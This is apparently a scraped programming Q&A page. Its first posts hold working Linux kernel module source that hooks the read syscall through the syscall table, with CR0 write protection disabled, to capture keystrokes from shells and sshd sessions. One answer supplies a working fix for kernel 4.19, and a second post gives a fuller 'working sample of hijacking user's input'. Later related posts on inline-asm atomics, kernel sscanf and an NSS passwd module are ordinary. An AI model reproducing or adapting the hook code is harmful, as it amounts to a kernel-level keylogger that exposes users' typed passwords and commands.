Memory Isolation in new Linux Kernels, or what? - c

This my module perfectly hijacks user's console: https://pastebin.com/99YJFnaq
And it was Linux kernel 4.12, Kali 2018.1.
Now, I've installed the latest version of Kali - 2019.1. It uses kernel 4.19:
Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1
(2019-01-03) x86_64 GNU/Linux
I'm trying to catch anything, but nothing with fd == 0 exists in flow.
I've googled for a long long time, tried to read changelogs on different resources...
I've found such module kpti, which probably would do something like that, but this module is not installed in Kali 2019.1.
Please, help me find the exact reason why hacked_read in this piece of code stopped hearing sys_read():
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
#define BUFFER_SIZE 512
#define MODULE_NAME "hacked_read"
#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.1" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail#domain.com>" );
static char debug_buffer[ BUFFER_SIZE ];
unsigned long ( *original_read ) ( unsigned int, char *, size_t );
void **sct;
unsigned long icounter = 0;
static inline void rw_enable( void ) {
asm volatile ( "cli \n"
"pushq %rax \n"
"movq %cr0, %rax \n"
"andq $0xfffffffffffeffff, %rax \n"
"movq %rax, %cr0 \n"
"popq %rax " );
}
static inline uint64_t getcr0(void) {
register uint64_t ret = 0;
asm volatile (
"movq %%cr0, %0\n"
:"=r"(ret)
);
return ret;
}
static inline void rw_disable( register uint64_t val ) {
asm volatile(
"movq %0, %%cr0\n"
"sti "
:
:"r"(val)
);
}
static void* find_sym( const char *sym ) {
static unsigned long faddr = 0; // static !!!
// ----------- nested functions are a GCC extension ---------
int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
if( 0 == strcmp( (char*)data, sym ) ) {
faddr = addr;
return 1;
} else return 0;
};// --------------------------------------------------------
kallsyms_on_each_symbol( symb_fn, (void*)sym );
return (void*)faddr;
}
unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
unsigned long r = 1;
if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
return original_read( fd, buf, count );
} else {
icounter++;
if ( icounter % 1000 == 0 ) {
info( "test2 icounter = %ld\n", icounter );
info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
}
r = original_read( fd, buf, count );
strncat( debug_buffer, buf, 1 );
if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
debug_buffer[0] = '\0';
return r;
}
}
int hacked_read_init( void ) {
register uint64_t cr0;
info( "Module was loaded\n" );
sct = find_sym( "sys_call_table" );
original_read = (void *)sct[ __NR_read ];
cr0 = getcr0();
rw_enable();
sct[ __NR_read ] = hacked_read_test;
rw_disable( cr0 );
return 0;
}
void hacked_read_exit( void ) {
register uint64_t cr0;
info( "Module was unloaded\n" );
cr0 = getcr0();
rw_enable();
sct[ __NR_read ] = original_read;
rw_disable( cr0 );
}
module_init( hacked_read_init );
module_exit( hacked_read_exit );
Makefile:
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)
TARGET = hacked_read
obj-m := $(TARGET).o
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
#rm -f *.o .*.cmd .*.flags *.mod.c *.order
#rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
#rm -fR .tmp*
#rm -rf .tmp_versions
I'm sure that everything like before keeps calling sys_read(). tee, bash, vi - all this stuff could not be changed in such short period, but linux-kernel.
I will appreciate the code with bypassing.

A bit of troubleshooting shows the following:
Of course, none of userspace programs stopped using read(). They still keep calling it.
There is no "memory isolation". The syscalls table is succesfully modified during the module initialization and the pointer to sys_read() is successfully replaced with pointer to hacked_read_test().
When the module is loaded, the read() syscall works as if it was the original one.
The change in the behavior happened between kernels 4.16 and 4.16.2 (i.e. between April 1, 2018 and April 12, 2018).
Considering this, we have pretty narrow list of commits to check, and the changes are likely to be in the syscalls mechanism. Well, looks like this commit is what we are looking for (and few more around).
The crucial part of this commit is that it changes signatures of the functions defined by SYSCALL_DEFINEx so that they accept a pointer to struct pt_regs instead of syscall arguments, i.e. sys_read(unsigned int fd, char __user * buf, size_t count) becomes sys_read(const struct pt_regs *regs). This means, that hacked_read_test(unsigned int fd, char *buf, size_t count) is no longer a valid replacement for sys_read()!
So, with new kernels you replace sys_read(const struct pt_regs *regs) with hacked_read_test(unsigned int fd, char *buf, size_t count). Why this does not crash and instead works as if it was the original sys_read()? Consider the simplified version of hacked_read_test() again:
unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
if ( fd != 0 ) {
return original_read( fd, buf, count );
} else {
// ...
}
}
Well. The first function argument is passed via %rdi register. The caller of sys_read() places a pointer to struct pt_regs into %rdi and performs a call. The execution flow goes inside hacked_read_test(), and the first argument, fd, is checked for not being zero. Considering that this argument contains a valid pointer instead of file descriptor, this condition succeeds and the control flow goes directly to original_read(), which receives the fd value (i.e., actually, the pointer to struct pt_regs) as a first argument, which, in turn, then gets successfully used as it was originally meant to be. So, since kernel 4.16.2 your hacked_read_test() effectively works as follows:
unsigned long hacked_read_test( const struct pt_regs *regs ) {
return original_read( regs );
}
To make sure about it, you can try the alternative version of hacked_read_test():
unsigned long hacked_read_test( void *ptr ) {
if ( ptr != 0 ) {
info( "invocation of hacked_read_test(): 1st arg is %d (%p)", ptr, ptr );
return original_read( ptr );
} else {
return -EINVAL;
}
}
After compiling and insmoding this version, you get the following:
invocation of hacked_read_test(): 1st arg is 35569496 (00000000c3a0dc9e)
You may create a working version of hacked_read_test(), but it seems that the implementation will be platform-dependent, as you will have to extract the arguments from the appropriate register fields of regs (for x86_84 these are %rdi, %rsi and %rdx for 1st, 2nd and 3rd syscall arguments respectively).
The working x86_64 implementation is below (tested on kernel 4.19).
#include <asm/ptrace.h>
// ...
unsigned long ( *original_read ) ( const struct pt_regs *regs );
// ...
unsigned long hacked_read_test( const struct pt_regs *regs ) {
unsigned int fd = regs->di;
char *buf = (char*) regs->si;
unsigned long r = 1;
if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
return original_read( regs );
} else {
icounter++;
if ( icounter % 1000 == 0 ) {
info( "test2 icounter = %ld\n", icounter );
info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
}
r = original_read( regs );
strncat( debug_buffer, buf, 1 );
if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
debug_buffer[0] = '\0';
return r;
}
}

Related

Best practice lkm to hijack inputs, is there lawful method?

This is working sample of hijacking user's input via overriding kernel's syscall read.
https://pastebin.com/K9zcSXrQ
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <linux/delay.h>
#include <linux/cred.h>
#include <linux/sched.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/types.h>
#include <linux/kfifo.h>
#include <linux/kobject.h>
#include <linux/sysfs.h>
#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
#include <asm/atomic.h>
#include <asm/ptrace.h>
#define PID_MAX 4194305
#define MODULE_NAME "hacked_read"
#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.4" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail#domain.com>" );
static bool debug = false;
static DEFINE_SPINLOCK( mLock );
static unsigned long ( *original_read ) ( const struct pt_regs *regs );
void **sct;
static unsigned long flags; // irq flags
static atomic_t LOCK_NUMBER_ATOM = ATOMIC_INIT(0);
static unsigned long long LOCK_NUMBER_ATOM_VAL;
static bool pids[ PID_MAX ];
static bool FORCE_EXIT = false; // force exit via method.
// ---------- force-exit handler -----
static struct kobject *force_exit_kobject;
static ssize_t foo_store(struct kobject *kobj, struct kobj_attribute *attr, const char *buf, size_t count) {
if ( strstr( buf, "exit" ) ) {
FORCE_EXIT = true;
info( "Force exit method. ");
}
return count;
}
static struct kobj_attribute foo_attribute = __ATTR( foo, S_IRUGO | S_IWUSR, NULL, foo_store );
// -------------- asm inserts -------------
static inline void rw_enable( void ) {
asm volatile ( "pushq %rax \n"
"movq %cr0, %rax \n"
"andq $0xfffffffffffeffff, %rax \n"
"movq %rax, %cr0 \n"
"popq %rax " );
}
static inline uint64_t getcr0(void) {
register uint64_t ret = 0;
asm volatile (
"movq %%cr0, %0\n"
:"=r"(ret)
);
return ret;
}
static inline void rw_disable( register uint64_t val ) {
asm volatile(
"movq %0, %%cr0\n"
:
:"r"(val)
);
}
static void* find_sym( const char *sym ) {
static unsigned long faddr = 0; // static !!!
// ----------- nested functions are a GCC extension ---------
int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
if( 0 == strcmp( (char*)data, sym ) ) {
faddr = addr;
return 1;
} else return 0;
};// --------------------------------------------------------
kallsyms_on_each_symbol( symb_fn, (void*)sym );
return (void*)faddr;
}
static unsigned long hacked_read_test( const struct pt_regs *regs ) {
unsigned long r;
unsigned long cp_user_flag;
unsigned long fd;
unsigned long strnlen_user_val;
unsigned long count;
static char tmp_buffer[ 1 ];
atomic_inc( &LOCK_NUMBER_ATOM );
pids[ task_pid_nr( current ) ] = true;
r = original_read( regs );
// injection:
if ( r > 0 ) {
fd = regs->di;
if ( fd == 0 ) { // fd == 0 --> stdin (sh, sshd)
strnlen_user_val = strnlen_user( (char*) regs->si, 1 );
count = regs->dx;
dbg( "strnlen_user_val: %lu\n", strnlen_user_val );
if ( strnlen_user_val > 0 && count > 0 ) {
if ( strnlen_user_val > 1 ) strnlen_user_val = 1;
cp_user_flag = copy_from_user( tmp_buffer, (char*) regs->si, strnlen_user_val );
if ( cp_user_flag == 0 ) {
info( "tmp_buffer: %s\n", tmp_buffer );
}
}
}
}
atomic_dec( &LOCK_NUMBER_ATOM );
pids[ task_pid_nr( current ) ] = false;
return r;
}
int hacked_read_init( void ) {
register uint64_t cr0;
int cpu;
int error = 0;
sct = find_sym( "sys_call_table" );
original_read = (void *)sct[ __NR_read ];
for_each_present_cpu( cpu ) {
spin_lock_irqsave( &mLock, flags );
cr0 = getcr0( );
rw_enable( );
sct[ __NR_read ] = hacked_read_test;
rw_disable( cr0 );
spin_unlock_irqrestore( &mLock, flags );
}
force_exit_kobject = kobject_create_and_add( "hacked_read_force_exit", kernel_kobj );
if( ! force_exit_kobject ) return -ENOMEM;
error = sysfs_create_file( force_exit_kobject, &foo_attribute.attr );
if ( error ) info( "failed to create the foo file in /sys/kernel/hacked_read_force_exit \n" );
info( "Module was loaded\n" );
return 0;
}
void hacked_read_exit( void ) {
register uint64_t cr0;
int cpu;
unsigned int i;
for_each_present_cpu( cpu ) {
spin_lock_irqsave( &mLock, flags );
cr0 = getcr0( );
rw_enable( );
sct[__NR_read] = original_read;
rw_disable( cr0 );
spin_unlock_irqrestore( &mLock, flags );
}
LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
while ( LOCK_NUMBER_ATOM_VAL != 0 ) {
info( "Locked. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL );
for( i = 0; i < PID_MAX; i++ ) if ( pids[ i ] ) info( "Locked. pid = %d\n", i );
msleep( 5000 );
LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
if ( FORCE_EXIT ) {
info( "Force exit. Unload module..." );
break;
}
}
kobject_put( force_exit_kobject );
info( "Open. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL);
info( "Module was unloaded\n" );
}
module_init( hacked_read_init );
module_exit( hacked_read_exit );
Makefile:
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)
TARGET = hacked_read
obj-m := $(TARGET).o
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
#rm -f *.o .*.cmd .*.flags *.mod.c *.order
#rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
#rm -fR .tmp*
#rm -rf .tmp_versions
I've read a lot stackoverflow on topic, and find such interesting opinion:
Why do you have to implement a syscall? 99% of the time, it's the wrong way to achieve whatever you're trying to do.
it is from here.
And now, I'm looking for the way to do the same hijack without syscall, is there?
May be kind of kernel-debug mechanism, something like kprobes might give me the same result much more safer than current raw override of syscall.
Could somebody give me working sample, please?
In other words, I'm looking for the lawful method, not a hack.

achieve GCC cas function for version 4.1.2 and earlier

My new company project, they want the code run for the 32-bit, the compile server is a CentOS 5.0 with GCC 4.1.1, that was the nightmare.
There are lots of functions using in the project like __sync_fetch_and_add was given in GCC 4.1.2 and later.
I was told can not upgrade GCC version, so I have to make another solution after Googling for several hours.
When I wrote a demo to test, I just got the wrong answer, the code blow want to replace function __sync_fetch_and_add
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
static int count = 0;
int compare_and_swap(int* reg, int oldval, int newval)
{
register char result;
#ifdef __i386__
__asm__ volatile ("lock; cmpxchgl %3, %0; setz %1"
: "=m"(*reg), "=q" (result)
: "m" (*reg), "r" (newval), "a" (oldval)
: "memory");
return result;
#elif defined(__x86_64__)
__asm__ volatile ("lock; cmpxchgq %3, %0; setz %1"
: "=m"(*reg), "=q" (result)
: "m" (*reg), "r" (newval), "a" (oldval)
: "memory");
return result;
#else
#error:architecture not supported and gcc too old
#endif
}
void *test_func(void *arg)
{
int i = 0;
for(i = 0; i < 2000; ++i) {
compare_and_swap((int *)&count, count, count + 1);
}
return NULL;
}
int main(int argc, const char *argv[])
{
pthread_t id[10];
int i = 0;
for(i = 0; i < 10; ++i){
pthread_create(&id[i], NULL, test_func, NULL);
}
for(i = 0; i < 10; ++i) {
pthread_join(id[i], NULL);
}
//10*2000=20000
printf("%d\n", count);
return 0;
}
Whent I got the wrong result:
[root#centos-linux-7 workspace]# ./asm
17123
[root#centos-linux-7 workspace]# ./asm
14670
[root#centos-linux-7 workspace]# ./asm
14604
[root#centos-linux-7 workspace]# ./asm
13837
[root#centos-linux-7 workspace]# ./asm
14043
[root#centos-linux-7 workspace]# ./asm
16160
[root#centos-linux-7 workspace]# ./asm
15271
[root#centos-linux-7 workspace]# ./asm
15280
[root#centos-linux-7 workspace]# ./asm
15465
[root#centos-linux-7 workspace]# ./asm
16673
I realize in this line
compare_and_swap((int *)&count, count, count + 1);
count + 1 was wrong!
Then how can I implement the same function as __sync_fetch_and_add. The compare_and_swap function works when the third parameter is constant.
By the way, compare_and_swap function is that right? I just Googled for that, not familiar with assembly.
I got despair with this question.
………………………………………………………………………………………………………………………………………………………………………………………………………………………
after seeing the answer below,I use while and got the right answer,but seems confuse more.
here is the code:
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
static unsigned long count = 0;
int sync_add_and_fetch(int* reg, int oldval, int incre)
{
register char result;
#ifdef __i386__
__asm__ volatile ("lock; cmpxchgl %3, %0; setz %1" : "=m"(*reg), "=q" (result) : "m" (*reg), "r" (oldval + incre), "a" (oldval) : "memory");
return result;
#elif defined(__x86_64__)
__asm__ volatile ("lock; cmpxchgq %3, %0; setz %1" : "=m"(*reg), "=q" (result) : "m" (*reg), "r" (newval + incre), "a" (oldval) : "memory");
return result;
#else
#error:architecture not supported and gcc too old
#endif
}
void *test_func(void *arg)
{
int i=0;
int result = 0;
for(i=0;i<2000;++i)
{
result = 0;
while(0 == result)
{
result = sync_add_and_fetch((int *)&count, count, 1);
}
}
return NULL;
}
int main(int argc, const char *argv[])
{
pthread_t id[10];
int i = 0;
for(i=0;i<10;++i){
pthread_create(&id[i],NULL,test_func,NULL);
}
for(i=0;i<10;++i){
pthread_join(id[i],NULL);
}
//10*2000=20000
printf("%u\n",count);
return 0;
}
the answer goes right to 20000,so i think when you use sync_add_and_fetch function,you should goes with a while loop is stupid,so I write like this:
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
static unsigned long count = 0;
int compare_and_swap(int* reg, int oldval, int incre)
{
register char result;
#ifdef __i386__
__asm__ volatile ("lock; cmpxchgl %3, %0; setz %1" : "=m"(*reg), "=q" (result) : "m" (*reg), "r" (oldval + incre), "a" (oldval) : "memory");
return result;
#elif defined(__x86_64__)
__asm__ volatile ("lock; cmpxchgq %3, %0; setz %1" : "=m"(*reg), "=q" (result) : "m" (*reg), "r" (newval + incre), "a" (oldval) : "memory");
return result;
#else
#error:architecture not supported and gcc too old
#endif
}
void sync_add_and_fetch(int *reg,int oldval,int incre)
{
int ret = 0;
while(0 == ret)
{
ret = compare_and_swap(reg,oldval,incre);
}
}
void *test_func(void *arg)
{
int i=0;
for(i=0;i<2000;++i)
{
sync_add_and_fetch((int *)&count, count, 1);
}
return NULL;
}
int main(int argc, const char *argv[])
{
pthread_t id[10];
int i = 0;
for(i=0;i<10;++i){
pthread_create(&id[i],NULL,test_func,NULL);
}
for(i=0;i<10;++i){
pthread_join(id[i],NULL);
}
//10*2000=20000
printf("%u\n",count);
return 0;
}
but when i run this code with ./asm after g++ -g -o asm asm.cpp -lpthread.the asm just stuck for more than 5min,see top in another terminal:
3861 root 19 0 102m 888 732 S 400 0.0 2:51.06 asm
I just confused,is this code not the same?
The 64-bit compare_and_swap is wrong as it swaps 64 bits but int is only 32 bits.
compare_and_swap should be used in a loop which retries it until is succeeds.
Your result look right to me. lock cmpxchg succeeds most of the time, but will fail if another core beat you to the punch. You're doing 20k attempts to cmpxchg count+1, not 20k atomic increments.
To write __sync_fetch_and_add with inline asm, you'll want to use lock xadd. It's specifically designed to implement fetch-add.
Implementing other operations, like fetch-or or fetch-and, require a CAS retry loop if you actually need the old value. So you could make a version of the function that doesn't return the old value, and is just a sync-and without the fetch, using lock and with a memory destination. (Compiler builtins can make this optimization based on whether the result is needed or not, but an inline asm implementation doesn't get a chance to choose asm based on that information.)
For efficiency, remember that and, or, add and many other instructions can use immediate operands, so a "re"(src) constraint would be appropriate (not "ri" for int64_t on x86-64, because that would allow immediates too large. https://gcc.gnu.org/onlinedocs/gcc/Machine-Constraints.html). But cmpxchg, xadd, and xchg can't use immediates, of course.
I'd suggest looking at compiler output for modern gcc (e.g. on http://godbolt.org/) for functions using the builtin, to see what compilers do.
But beware that inline asm can compile correctly given one set of surrounding code, but not the way you expect given different code. e.g. if the surrounding code copied a value after using CAS on it (probably unlikely), the compiler might decide to give the asm template two different memory operands for "=m"(*reg) and "m"(*reg), but your asm template assumes they will always be the same address.
IDK if gcc4.1 supports it, but "+m"(*reg) would declare a read/write memory operand. Otherwise perhaps you can use a matching constraint to say that the input is in the same location as an earlier operand, like "0"(*reg). But that might only work for registers, not memory, I didn't check.
"a" (oldval) is a bug: cmpxchg writes EAX on failure.
It's not ok to tell the compiler you leave a reg unmodified, and then write an asm template that does modify it. You will get unpredictable behaviour from stepping on the compiler's toes.
See c inline assembly getting "operand size mismatch" when using cmpxchg for a safe inline-asm wrapper for lock cmpxchg. It's written for gcc6 flag-output, so you'll have to back-port that and maybe a few other syntax details to crusty old gcc4.1.
That answer also addresses returning the old value so it doesn't have to be separately loaded.
(Using ancient gcc4.1 sounds like a bad idea to me, especially for writing multi-threaded code. So much room for error from porting working code with __sync builtins to hand-rolled asm. The risks of using a newer compiler, like stable gcc5.5 if not gcc7.4, are different but probably smaller.)
If you're going to rewrite code using __sync builtins, the sane thing would be to rewrite it using C11 stdatomic.h, or GNU C's more modern __atomic builtins that are intended to replace __sync.
The Linux kernel does successfully use inline asm for hand-rolled atomics, though, so it's certainly possible.
If you truly are in such a predicament, I would start with the following header file:
#ifndef SYNC_H
#define SYNC_H
#if defined(__x86_64__) || defined(__i386__)
static inline int sync_val_compare_and_swap_int(int *ptr, int oldval, int newval)
{
__asm__ __volatile__( "lock cmpxchgl %[newval], %[ptr]"
: "+a" (oldval), [ptr] "+m" (*ptr)
: [newval] "r" (newval)
: "memory" );
return oldval;
}
static inline int sync_fetch_and_add_int(int *ptr, int val)
{
__asm__ __volatile__( "lock xaddl %[val], %[ptr]"
: [val] "+r" (val), [ptr] "+m" (*ptr)
:
: "memory" );
return val;
}
static inline int sync_add_and_fetch_int(int *ptr, int val)
{
const int old = val;
__asm__ __volatile__( "lock xaddl %[val], %[ptr]"
: [val] "+r" (val), [ptr] "+m" (*ptr)
:
: "memory" );
return old + val;
}
static inline int sync_fetch_and_sub_int(int *ptr, int val) { return sync_fetch_and_add_int(ptr, -val); }
static inline int sync_sub_and_fetch_int(int *ptr, int val) { return sync_add_and_fetch_int(ptr, -val); }
/* Memory barrier */
static inline void sync_synchronize(void) { __asm__ __volatile__( "mfence" ::: "memory"); }
#else
#error Unsupported architecture.
#endif
#endif /* SYNC_H */
The same extended inline assembly works for both x86 and x86-64. Only the int type is implemented, and you do need to replace possible __sync_synchronize() calls with sync_synchronize(), and each __sync_...() call with sync_..._int().
To test, you can use e.g.
#include <stdlib.h>
#include <pthread.h>
#include <string.h>
#include <errno.h>
#include <stdio.h>
#include "sync.h"
#define THREADS 16
#define PERTHREAD 8000
void *test_func1(void *sumptr)
{
int *const sum = sumptr;
int n = PERTHREAD;
while (n-->0)
sync_add_and_fetch_int(sum, n + 1);
return NULL;
}
void *test_func2(void *sumptr)
{
int *const sum = sumptr;
int n = PERTHREAD;
while (n-->0)
sync_fetch_and_add_int(sum, n + 1);
return NULL;
}
void *test_func3(void *sumptr)
{
int *const sum = sumptr;
int n = PERTHREAD;
int oldval, curval, newval;
while (n-->0) {
curval = *sum;
do {
oldval = curval;
newval = curval + n + 1;
} while ((curval = sync_val_compare_and_swap_int(sum, oldval, newval)) != oldval);
}
return NULL;
}
static void *(*worker[3])(void *) = { test_func1, test_func2, test_func3 };
int main(void)
{
pthread_t thread[THREADS];
pthread_attr_t attrs;
int sum = 0;
int t, result;
pthread_attr_init(&attrs);
pthread_attr_setstacksize(&attrs, 65536);
for (t = 0; t < THREADS; t++) {
result = pthread_create(thread + t, &attrs, worker[t % 3], &sum);
if (result) {
fprintf(stderr, "Failed to create thread %d of %d: %s.\n", t+1, THREADS, strerror(errno));
exit(EXIT_FAILURE);
}
}
pthread_attr_destroy(&attrs);
for (t = 0; t < THREADS; t++)
pthread_join(thread[t], NULL);
t = THREADS * PERTHREAD * (PERTHREAD + 1) / 2;
if (sum == t)
printf("sum = %d (as expected)\n", sum);
else
printf("sum = %d (expected %d)\n", sum, t);
return EXIT_SUCCESS;
}
Unfortunately, I don't have an ancient version of GCC to test, so this has only been tested with GCC 5.4.0 and GCC-4.9.3 for x86 and x86-64 (using -O2) on Linux.
If you find any bugs or issues in the above, please let me know in a comment so I can verify and fix as needed.

sscanf linux kernel differs from sscanf glibc

Running the following code (make runtest) on my machine (4.6.4-1-ARCH)
/* scanf userland & kernelspace test */
#if __KERNEL__
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/string.h>
MODULE_AUTHOR("Enteee (duckpond.ch) ");
MODULE_DESCRIPTION("scanf test");
MODULE_LICENSE("GPL");
MODULE_ALIAS("scanf_test");
#else
#include <stdio.h>
#include <string.h>
#define printk printf
#endif
void test(void){
int ret = 0;
char fp[20] = { 0 };
memset(fp, 0xaa, sizeof(fp));
printk("init, ret = %d fp = "
"%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx"
"%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx"
"%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx"
"%2.2hhx%2.2hhx, "
// overflow prints (hacky)
"after fp = "
"%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx, "
"before fp = "
"%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx"
"\n",
ret,
(fp)[0], (fp)[1], (fp)[2], (fp)[3], (fp)[4], (fp)[5],
(fp)[6], (fp)[7], (fp)[8], (fp)[9], (fp)[10], (fp)[11],
(fp)[12], (fp)[13], (fp)[14], (fp)[15], (fp)[16], (fp)[17],
(fp)[18], (fp)[19],
// overflow
(fp)[20], (fp)[21], (fp)[22], (fp)[23], (fp)[24], (fp)[25],
(fp)[-1], (fp)[-2], (fp)[-3], (fp)[-4], (fp)[-5], (fp)[-6]
);
ret = sscanf("aabb", "%2hhx%2hhx", &fp[0], &fp[1]);
printk("ret = %d fp = %2.2hhx%2.2hhx\n", ret, fp[0], fp[1]);
ret = sscanf(
"ffffffffffffffffffffffffffffffffffffffff",
"%2hhx%2hhx%2hhx%2hhx%2hhx%2hhx"
"%2hhx%2hhx%2hhx%2hhx%2hhx%2hhx"
"%2hhx%2hhx%2hhx%2hhx%2hhx%2hhx"
"%2hhx%2hhx",
&(fp)[0], &(fp)[1], &(fp)[2], &(fp)[3], &(fp)[4], &(fp)[5],
&(fp)[6], &(fp)[7], &(fp)[8], &(fp)[9], &(fp)[10], &(fp)[11],
&(fp)[12], &(fp)[13], &(fp)[14], &(fp)[15], &(fp)[16], &(fp)[17],
&(fp)[18], &(fp)[19]
);
printk("ret = %d fp = "
"%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx"
"%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx"
"%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx"
"%2.2hhx%2.2hhx, "
// overflow prints (hacky)
"after fp = "
"%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx, "
"before fp = "
"%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx%2.2hhx"
"\n",
ret,
(fp)[0], (fp)[1], (fp)[2], (fp)[3], (fp)[4], (fp)[5],
(fp)[6], (fp)[7], (fp)[8], (fp)[9], (fp)[10], (fp)[11],
(fp)[12], (fp)[13], (fp)[14], (fp)[15], (fp)[16], (fp)[17],
(fp)[18], (fp)[19],
(fp)[20], (fp)[21], (fp)[22], (fp)[23], (fp)[24], (fp)[25],
(fp)[-1], (fp)[-2], (fp)[-3], (fp)[-4], (fp)[-5], (fp)[-6]
);
}
#ifndef __KERNEL__
int main(void){
test();
return 0;
}
#else
static int __init test_init(void) {
test();
return 0;
}
static void __exit test_exit(void) {
}
module_init(test_init);
module_exit(test_exit);
#endif
yields:
=== user space ===
init, ret = 0 fp = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, after fp = 65005f5f7664, before fp = 000000000000
ret = 2 fp = aabb
ret = 20 fp = ffffffffffffffffffffffffffffffffffffffff, after fp = 65005f5f7664, before fp = 000000000000
=== kernel space ===
[386177.161037] init, ret = 0 fp = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, after fp = baae0dbc0000, before fp = bc0daebaffff
[386177.161044] ret = 2 fp = aabb
[386177.161061] ret = 20 fp = 000000000000000000000000ffffffffffffffff, after fp = baae0dbc0000, before fp = bc0daebaffff
The test.c basically reads ffffffffffffffffffffffffffffffffffffffff to fp using sscanf with a sequence of %2hhx format specifiers. After that, it prints fp using printf / printk with a sequence of %2.2hhx format specifiers.
Can somebody explain me why fp is no the same when read with glibc sscanf and linux sscanf. In addition, why is the aabb-test working just fine?
I already checked the linux sscanf impelmentation and from what I can see it should be similar to the glibc sscanf.
I do think I'm missing the obvious here..
Notes:
the gist containing the Makefile can be found here
this is just an example, please don't tell me that this is an ugly implementation. There are even 24 invalid reads! thx, I'm aware of that.

Adding a Service to Name Service Switch

So I am trying to add a service to NSS (Name Service Switch). Please note the GNU guide on how to do it here. I have been following that guide. I need to implement a service that works with the passwd database.
The problem I am having is my module is not being called for certain functions. Let me reproduce some of my code here...
enum nss_status
_nss_myservice_setpwent (void) {
printf( "# %s\n", __FUNCTION__ ) ;
return NSS_STATUS_SUCCESS ;
} ;
enum nss_status
_nss_myservice_endpwent (void) {
printf( "# %s\n", __FUNCTION__ ) ;
return NSS_STATUS_SUCCESS ;
} ;
enum nss_status
_nss_myservice_getpwent_r (struct passwd *result, char *buffer,
size_t buflen, int *errnop) {
static int i = 0 ;
if( i++ == 0 ) {
printf( "# %s\n", __FUNCTION__ ) ;
return init_result( result, buffer, buflen, errnop ) ;
} else {
i = 0 ;
return NSS_STATUS_NOTFOUND ;
}
} ;
enum nss_status
_nss_myservice_getpwbynam (const char *nam, struct passwd *result, char *buffer,
size_t buflen, int *errnop) {
printf( "# %s with name %s\n", __FUNCTION__, nam ) ;
return init_result( result, buffer, buflen, errnop ) ;
} ;
enum nss_status
_nss_myservice_getpwbynam_r (const char *nam, struct passwd *result, char *buffer,
size_t buflen, int *errnop) {
printf( "# %s with name_r %s\n", __FUNCTION__, nam ) ;
return init_result( result, buffer, buflen, errnop ) ;
} ;
